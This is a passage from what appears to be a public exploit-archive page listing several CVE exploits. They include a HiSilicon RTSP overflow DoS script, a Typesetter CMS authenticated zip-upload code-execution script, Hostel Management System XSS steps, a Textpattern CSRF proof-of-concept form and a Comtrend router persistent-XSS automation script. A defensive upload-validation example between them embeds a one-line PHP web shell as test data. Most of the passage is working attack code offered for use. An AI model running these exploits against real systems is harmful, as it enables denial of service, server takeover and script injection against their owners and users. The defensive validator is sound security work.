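        print(f"line {i}: checkScript with process spawn, decoded script:\n{script}")
```

Decoding before matching is the point: the raw log line never contains the string ".execute(", only its percent-encoded form, so a detection rule written against the undecoded request line would miss exactly the payload the advisory shows.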
-
HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS)
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24214
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979

if [ "$#" -ne 2 ]
then
  echo "usage: $0 <server> <RTSP port>"
  exit 1
fi

server=$1
port=$2

printf "checking the target... "
timeout 2 curl -s rtsp://$server:$port \
  || { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
printf "RTSP server detected\n"

# A 3000-character CSeq header overflows the RTSP request parser.
cseq=$(printf "0%0.s" {1..3000})

printf "sending the payload... "
printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1
printf "done\n"
sleep 1

printf "checking the target again... "
if timeout 2 curl -s rtsp://$server:$port
then
  echo "ERROR: the RTSP server still seems to be running :("
else
  echo "SUCCESS: the server is down"
fi
-
Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)
# Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City
# Google Dork: N/A
# Date: 2020-10-08
# Exploit Author: Kokn3t
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/hostel-management-system
# Version: V 2.1
# Tested on: Windows 10, Kali 2020.1
# CVE : CVE-2020-25270

######## Attack Vector ########

Install Hostel Management System V 2.1

1) User Module
Log in as a user, go to "Book Hostel" (http://localhost/hostel/book-hostel.php) and start a booking. Add the malicious script "<script>alert('XSS');</script>" in these fields:
  i.   Guardian Name
  ii.  Guardian Relation
  iii. Guardian Contact no
  iv.  Address
  v.   City
After that you will get the prompt "Student Successfully register"; after pressing "See All", the XSS is triggered.

2) Admin Module
Log in as Admin, go to "Management Students" and "View Full details" of the booked student's record; the XSS is triggered there as well.
-
Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)
# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790

######## Description ########
#
# The CMS Typesetter has functionality (web interface) where it is possible
# through an account with privileges to perform uploads. Through this
# functionality, it is possible to upload a .zip file that contains a
# malicious .php file. In the same functionality, there is also the
# possibility to extract the file through the same web interface; the
# attacker only needs to extract the .zip that was previously uploaded and
# click on the malicious .php file to execute commands on the operating
# system.
#

######## Exploit with PoC ########
https://github.com/t0gu/CVE-2020-25790

####### Code #######
# see the poc at https://github.com/t0gu/CVE-2020-25790

import argparse
import re
import requests
import urllib3
from bs4 import BeautifulSoup
from urllib3.exceptions import InsecureRequestWarning

# All requests below use verify=False; silence the resulting warnings.
urllib3.disable_warnings(InsecureRequestWarning)

banner = """
CVE-2020-25790 - Typesetter CMS 5.1 arbitrary code execution
by: t0gu

usage: main.py [-h] -p PASSWORD -l LOGIN -u URL -f FILE
==> Exploit for CVE 2020-25790

optional arguments:
  -h, --help            show this help message and exit
  -p PASSWORD, --password PASSWORD
                        ==> admin password
  -l LOGIN, --login LOGIN
                        ==> admin login
  -u URL, --url URL     ==> main URL
  -f FILE, --file FILE  ==> malicious zip file with a php file inside
"""
print(banner)

menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790")
menu.add_argument("-p", "--password", required=True, help="==> admin password")
menu.add_argument("-l", "--login", required=True, help="==> admin login")
menu.add_argument("-u", "--url", required=True, help="==> main URL")
menu.add_argument("-f", "--file", required=True, help="==> malicious zip file with a php file inside")
args = menu.parse_args()

login = args.login
password = args.password
url = args.url
file = args.file

# Optional interception proxy; pass proxies=PROXIES to the requests calls to
# watch the traffic in Burp.
PROXIES = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080",
}


class Exploit:
    def __init__(self, login, password, url, file):
        self.login = login
        self.password = password
        self.url = url
        self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari"
        self.file = open(file, 'rb')

    def get_nounce(self):
        # The login form carries a one-time nonce in a hidden input; the first
        # non-empty input value on /Admin is taken as that nonce.
        try:
            url = self.url + "/Admin"
            r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False)
            soap_obj = BeautifulSoup(r.text, 'html.parser')
            for inp in soap_obj.find_all("input"):
                nounce = inp.get('value')
                if nounce:
                    return nounce
        except requests.exceptions.RequestException as e:
            print(f'==> Error {e}')

    def get_cookies(self):
        # Log in with the nonce and return the session cookie as "name=value;".
        nounce = self.get_nounce()
        if not nounce:
            return None
        try:
            url = self.url + "/Admin"
            data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login,
                         'user_sha': '', 'password': self.password, 'pass_md5': '', 'pass_sha': '',
                         'pass_sha512': '', 'remember': 'on', 'verified': ''}
            r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False,
                              headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'})
            cookie_admin = r.headers['Set-Cookie']
            cookie_name = cookie_admin.split(':')[0].split('=')[0]
            cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0]
            if not cookie_name or not cookie_value:
                print("==> Something went wrong while login")
                return None
            return f"{cookie_name}={cookie_value};"
        except (requests.exceptions.RequestException, KeyError) as e:
            print(f'==> Error while login {e}')

    def get_verified(self):
        # The file manager page embeds a per-session "verified" token in its JSON config.
        try:
            url = self.url + "/Admin/Uploaded"
            auth_cookie = self.get_cookies()
            r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie},
                             timeout=10, verify=False)
            m = re.search(r'"verified":"(.*)"}', r.text)
            if m is not None:
                return m.group(1)
        except requests.exceptions.RequestException as e:
            print(f'==> Error {e}')

    def get_hash_folders(self):
        # Ask the finder backend for the directory tree and take the hash of the
        # third entry as the upload target directory.
        cookie_auth = self.get_cookies()
        hash_verified = self.get_verified()
        data_post = {'verified': hash_verified, 'cmd': 'open', 'target': '', 'init': 1, 'tree': 1}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post,
                              headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth},
                              timeout=10, verify=False)
            json_data = r.json()
            hash_dir = json_data['files'][2]['hash']
            return hash_dir
        except (requests.exceptions.RequestException, ValueError, KeyError, IndexError) as e:
            print(f'==> Error {e}')

    def upload_zip(self):
        url = self.url + '/Admin_Finder'
        hash_verified = self.get_verified()
        hash_dir = self.get_hash_folders()
        auth_cookie = self.get_cookies()
        try:
            print(f"==> Uploading file: {self.file.name}")
            data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified}
            r = requests.post(url=url, verify=False, timeout=10,
                              headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie},
                              data=data, files={'upload[]': self.file})
            hash_file = r.json()['added'][0]['hash']
            self.extract_file(auth_cookie, hash_file, hash_verified)
        except (requests.exceptions.RequestException, ValueError, KeyError, IndexError) as e:
            print(f"==> Error while uploading {e}")

    def extract_file(self, auth_cookie, hash_file, hash_verified):
        # Extract the uploaded zip server-side; the .php inside lands under the web root.
        data_post = {'verified': hash_verified, 'cmd': 'extract', 'target': hash_file}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post,
                              headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie},
                              timeout=10, verify=False)
            name_file = r.json()['added'][0]['name']
            print(f"==> All Hashes are collected from: {name_file}")
            self.xpl(auth_cookie, name_file)
        except (requests.exceptions.RequestException, ValueError, KeyError, IndexError) as e:
            print(f'==> Error {e}')

    def xpl(self, auth_cookie, name_file):
        # Request the extracted script with cmd=id and pull the command output from <pre>.
        try:
            url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
            new_url = url.replace("index.php", "")
            print(f"==> Try to exploit: {new_url}")
            r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie},
                             timeout=10, verify=False)
            m = re.search(r'<pre>(.*?)</pre>', r.text.replace("\n", ""))
            if m is not None:
                print(f"==> Vulnerable: {m.group(1)}")
        except requests.exceptions.RequestException as e:
            print(f'==> Error {e}')


if __name__ == "__main__":
    obj = Exploit(login, password, url, file)
    obj.upload_zip()
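Six entries on this page (Hotel Management System, Tourism Management System, Online Student's Management System, the CS-Cart .phtml rename, the HiSilicon filename injection and Typesetter's zip-then-extract) are the same failure: the server trusts the client-supplied filename, or the names inside an archive, and stores them under the web root. The following is an added example, not code from any of those advisories or projects: the gate a PHP-serving upload handler should apply, written in Python so it runs here. It enforces a strict filename character set, rejects PHP-executable extensions in any position, checks image magic bytes against the extension, and inspects archive members before anything is extracted. The sample names, bytes and zip are constructed inline.

```python
import io
import posixpath
import re
import zipfile

# Extensions PHP SAPIs / Apache handlers commonly execute; "phtml" is exactly the
# rename used in the CS-Cart entry above.
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht"}
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def filename_problem(name):
    """Return a reason if the client-supplied name must be rejected, else None."""
    if not SAFE_NAME_RE.match(name):
        # Rejects "logo;id;.png"-style shell metacharacters, path separators
        # and dotfiles such as .htaccess.
        return "bad characters"
    # Check every dotted segment, so shell.php.png and shell.phtml both fail.
    segments = name.lower().split(".")[1:]
    if any(seg in PHP_EXTENSIONS for seg in segments):
        return "executable extension"
    return None


def image_problem(name, data):
    """The extension must match the file's magic bytes; a .png full of PHP fails here."""
    ext = name.rsplit(".", 1)[-1].lower()
    magic = IMAGE_MAGIC.get(ext)
    if magic is None:
        return "not an allowed image type"
    if not data.startswith(magic):
        return "content does not match extension"
    return None


def archive_problems(zip_bytes):
    """Inspect members before anyone extracts them: no path escapes, no PHP."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            member = info.filename
            norm = posixpath.normpath(member)
            if member.startswith("/") or norm == ".." or norm.startswith("../"):
                problems.append((member, "path traversal"))
                continue
            if member.endswith("/"):
                continue  # directory entry, nothing to execute
            reason = filename_problem(posixpath.basename(member))
            if reason:
                problems.append((member, reason))
    return problems


def build_zip(members):
    """Constructed test archive from a dict of name -> bytes; not a real upload."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    for name in ("shell.php", "shell.phtml", "file1.php.png", "logo;id;.png", "photo.png"):
        print(f"{name:16s} -> {filename_problem(name) or 'ok'}")
    print("php in .png      ->", image_problem("photo.png", b"<?php phpinfo(); ?>"))
    evil = build_zip({"readme.txt": b"hi", "index.php": b"<?php system($_GET['cmd']); ?>",
                      "../up.txt": b"x"})
    print("zip members      ->", archive_problems(evil))
```

The order matters: the character-set check runs first so that a name like logo;id;.png never reaches a shell or the filesystem, the extension check looks at every segment rather than only the last one, and archive members get the same treatment as a direct upload because extraction is just another way of writing attacker-named files under the web root.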
-
Textpattern CMS 4.6.2 - Cross-site Request Forgery
# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery
# Exploit Author: Alperen Ergel
# Contact: @alpren_ae
# Software Homepage: https://textpattern.com/
# Version : 4.6.2
# Tested on: Windows 10 / XAMPP
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 2020-10-29

######## Description ########
#
# 1-) Log in to the administrator page
#
# 2-) Go to admin > prefs > site
#
# 3-) All inputs are vulnerable to CSRF
#
#
######## Proof of Concept ########

========>>> REQUEST <<<=========

POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/textpattern/textpattern/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 1806
Connection: close
Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40
Upgrade-Insecure-Requests: 1

Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0&
is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7&
use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles&
file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=&
smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4&
title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1&
use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1&
include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0&
comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1&
comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=&
custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=&
step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720

### EXPLOIT ####

<html>
  <!-- CSRF PoC -->
  <body>
    <form action="https://localhost/textpattern/textpattern/index.php" method="POST">
      <input type="hidden" name="Submit" value="Save" />
      <input type="hidden" name="sitename" value="CHANGEHERE" />
      <input type="hidden" name="siteurl" value="CHANGEHERE" />
      <input type="hidden" name="site_slogan" value="CHANGEHERE" />
      <input type="hidden" name="production_status" value="testing" />
      <input type="hidden" name="timezone_key" value="Europe/Berlin" />
      <input type="hidden" name="auto_dst" value="0" />
      <input type="hidden" name="is_dst" value="0" />
      <input type="hidden" name="dateformat" value="since" />
      <input type="hidden" name="archive_dateformat" value="%b %Oe, %I:%M %p" />
      <input type="hidden" name="permlink_mode" value="section_id_title" />
      <input type="hidden" name="doctype" value="html5" />
      <input type="hidden" name="logging" value="none" />
      <input type="hidden" name="expire_logs_after" value="7" />
      <input type="hidden" name="use_comments" value="1" />
      <input type="hidden" name="img_dir" value="images" />
      <input type="hidden" name="skin_dir" value="themes" />
      <input type="hidden" name="file_base_path" value="/var/www/vhosts/.demo.localhost./httpdocs/textpattern/files" />
      <input type="hidden" name="file_max_upload_size" value="2000000" />
      <input type="hidden" name="tempdir" value="/var/www/vhosts/.demo.localhost./httpdocs/textpattern/textpattern/tmp" />
      <input type="hidden" name="plugin_cache_dir" value="" />
      <input type="hidden" name="smtp_from" value="" />
      <input type="hidden" name="publisher_email" value="" />
      <input type="hidden" name="override_emailcharset" value="0" />
      <input type="hidden" name="enable_xmlrpc_server" value="0" />
      <input type="hidden" name="default_event" value="article" />
      <input type="hidden" name="theme_name" value="hive" />
      <input type="hidden" name="module_pophelp" value="1" />
      <input type="hidden" name="default_publish_status" value="4" />
      <input type="hidden" name="title_no_widow" value="0" />
      <input type="hidden" name="articles_use_excerpts" value="1" />
      <input type="hidden" name="allow_form_override" value="1" />
      <input type="hidden" name="attach_titles_to_permalinks" value="1" />
      <input type="hidden" name="permlink_format" value="1" />
      <input type="hidden" name="send_lastmod" value="1" />
      <input type="hidden" name="publish_expired_articles" value="0" />
      <input type="hidden" name="use_textile" value="1" />
      <input type="hidden" name="enable_short_tags" value="1" />
      <input type="hidden" name="use_plugins" value="1" />
      <input type="hidden" name="admin_side_plugins" value="1" />
      <input type="hidden" name="allow_page_php_scripting" value="1" />
      <input type="hidden" name="allow_article_php_scripting" value="1" />
      <input type="hidden" name="max_url_len" value="1000" />
      <input type="hidden" name="syndicate_body_or_excerpt" value="1" />
      <input type="hidden" name="rss_how_many" value="5" />
      <input type="hidden" name="show_comment_count_in_feed" value="1" />
      <input type="hidden" name="include_email_atom" value="0" />
      <input type="hidden" name="use_mail_on_feeds_id" value="0" />
      <input type="hidden" name="comments_on_default" value="0" />
      <input type="hidden" name="comments_default_invite" value="Comment" />
      <input type="hidden" name="comments_moderate" value="1" />
      <input type="hidden" name="comments_disabled_after" value="42" />
      <input type="hidden" name="comments_auto_append" value="0" />
      <input type="hidden" name="comments_mode" value="0" />
      <input type="hidden" name="comments_dateformat" value="%b %Oe, %I:%M %p" />
      <input type="hidden" name="comments_sendmail" value="0" />
      <input type="hidden" name="comments_are_ol" value="1" />
      <input type="hidden" name="comment_means_site_updated" value="1" />
      <input type="hidden" name="comments_require_name" value="1" />
      <input type="hidden" name="comments_require_email" value="1" />
      <input type="hidden" name="never_display_email" value="1" />
      <input type="hidden" name="comment_nofollow" value="1" />
      <input type="hidden" name="comments_disallow_images" value="0" />
      <input type="hidden" name="comments_use_fat_textile" value="0" />
      <input type="hidden" name="spam_blacklists" value="" />
      <input type="hidden" name="custom_1_set" value="custom1" />
      <input type="hidden" name="custom_2_set" value="custom2" />
      <input type="hidden" name="custom_3_set" value="" />
      <input type="hidden" name="custom_4_set" value="" />
      <input type="hidden" name="custom_5_set" value="" />
      <input type="hidden" name="custom_6_set" value="" />
      <input type="hidden" name="custom_7_set" value="" />
      <input type="hidden" name="custom_8_set" value="" />
      <input type="hidden" name="custom_9_set" value="" />
      <input type="hidden" name="custom_10_set" value="" />
      <input type="hidden" name="step" value="prefs_save" />
      <input type="hidden" name="event" value="prefs" />
      <input type="hidden" name="_txp_token" value="0342db47efb6882b488f6d367067d720" />
      <input type="submit" value="Do Action" />
    </form>
  </body>
</html>
-
Comtrend AR-5387un router - Persistent XSS (Authenticated)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Exploit Title: Persistent XSS on Comtrend AR-5387un router
Date: 19/10/2020
Exploit Author: OscarAkaElvis
Vendor Homepage: https://www.comtrend.com/
Version: Comtrend AR-5387un router
Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i
CVE: CVE-2018-8062

Disclosure timeline:
08/03/2018: Vulnerability was discovered
10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062)
11/03/2018: Mitre answered, CVE number reserved
11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered
16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233)
18/10/2020: Exploit creation
19/10/2020: Exploit sent to exploit-db

Exploitation explanation:
To exploit this vulnerability, once logged into the router, a WAN service must be created.
Click on "Advanced Setup", "WAN Service", the "Add" button, then "Next".
Then insert the payload into the "Enter Service Description" field.
This was used for the PoC: <script>alert('xss');</script>
Then click on "Next" four times to go through the steps and finally click on "Apply/Save".
The result of the XSS will be displayed and triggered on the WAN services page.

This exploit automates the entire process, bypassing CSRF protection and allowing a custom XSS payload to be set.

Happy hacking :)
OscarAkaElvis - https://twitter.com/OscarAkaElvis
"""

# Dependencies and libraries
import requests
from requests.auth import HTTPBasicAuth
import re
from sys import argv, exit
import argparse
from os import path
from time import sleep


class Exploit(object):

    # Global class vars
    session = requests.Session()
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36"
    ip = None
    username = None
    password = None
    payload = None
    default_ip = "192.168.1.1"
    default_username = "admin"
    default_password = "admin"
    default_payload = "<script>alert('xss');</script>"
    exploit_version = "1.0"
    current_sessionkey = None
    referer_sessionkey = None
    script_name = path.basename(argv[0])
    description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router'
    epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\''

    def start_msg(self):
        print("[*] Starting CVE-2018-8062 exploit...")
        sleep(0.5)

    def check_params(self, arguments):
        parser = argparse.ArgumentParser(description=self.description_text,
                                         formatter_class=argparse.RawDescriptionHelpFormatter,
                                         epilog=self.epilog_text)
        parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP')
        parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME')
        parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD')
        parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD')
        parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit")
        args = parser.parse_args(arguments)

        self.start_msg()
        print("[*] Launch the exploit using -h argument to check all the available options")
        print()

        if not args.ip:
            self.ip = self.default_ip
            print("[!] Warning, no ip set, default will be used: " + str(self.ip))
        else:
            self.ip = args.ip

        if not args.username:
            self.username = self.default_username
            print("[!] Warning, no username set, default will be used: " + str(self.username))
        else:
            self.username = args.username

        if not args.password:
            self.password = self.default_password
            print("[!] Warning, no password set, default will be used: " + str(self.password))
        else:
            self.password = args.password

        if not args.payload:
            self.payload = self.default_payload
            print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload))
        else:
            # The original assigned args.password here, so -x was silently ignored
            self.payload = args.payload

    def print_version(self):
        print()
        return 'v{}'.format(self.exploit_version)

    def check_router(self):
        try:
            print()
            print("[*] Trying to detect router...")
            headers = {"User-Agent": self.user_agent}
            response = self.session.get("http://" + str(self.ip) + "/", headers=headers)
            if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)):
                print("[+] Comtrend router detected successfully")
            else:
                print()
                print("[-] It seems the target is not a Comtrend router")
                print("[*] Exiting...")
                exit(1)
        except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError):
            print()
            print("[-] Can't connect to the router")
            print("[*] Exiting...")
            exit(1)

    def check_login(self):
        print()
        print("[*] Trying to login...")
        headers = {"User-Agent": self.user_agent}
        response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        if response.status_code != 401:
            print("[+] Login successful!")
            sleep(1)
        else:
            print()
            print("[-] Can't login into the router. Check your creds!")
            print("[*] Exiting...")
            exit(1)

    def get_sessionKey(self, response_text):
        # The router embeds the per-page CSRF token as sessionKey=NNN, either
        # bare or inside an escaped JavaScript string literal
        sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text))
        if sessionKey is not None:
            sessionKey = sessionKey.group(1)
        else:
            sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE)
            if sessionKey is not None:
                sessionKey = sessionKey.group(1)
        return sessionKey

    def step1(self):
        print()
        print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...")
        headers = {"User-Agent": self.user_agent}
        response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.current_sessionkey = self.get_sessionKey(response.content)
        print("[+] Success! Initial sessionKey: " + str(self.current_sessionkey))
        sleep(1)

    def step2(self):
        print()
        print("[*] Performing step 2/8...")
        paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"}
        response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step3(self):
        print()
        print("[*] Performing step 3/8...")
        paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step4(self):
        print()
        print("[*] Performing step 4/8...")
        paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0",
                     "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step5(self):
        print()
        print("[*] Performing step 5/8...")
        paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey,
                     "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0",
                     "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0",
                     "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0",
                     "pppAuthMethod": "0", "pppToBridge": "0"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step6(self):
        print()
        print("[*] Performing step 6/8...")
        paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def step7(self):
        print()
        print("[*] Performing step 7/8...")
        paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey}
        response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        self.referer_sessionkey = self.current_sessionkey
        self.current_sessionkey = self.get_sessionKey(response.content)
        sleep(1)

    def final_step8(self):
        print()
        print("[*] Performing final step 8/8. Deploying XSS payload...")
        paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"}
        headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey}
        self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
        print()
        print("[+] XSS payload deployed successfully")
        print("[+] Happy hacking :) . Author: OscarAkaElvis")

    @staticmethod
    def main(self, arguments):
        self.check_params(arguments)
        self.check_router()
        self.check_login()
        self.step1()
        self.step2()
        self.step3()
        self.step4()
        self.step5()
        self.step6()
        self.step7()
        self.final_step8()
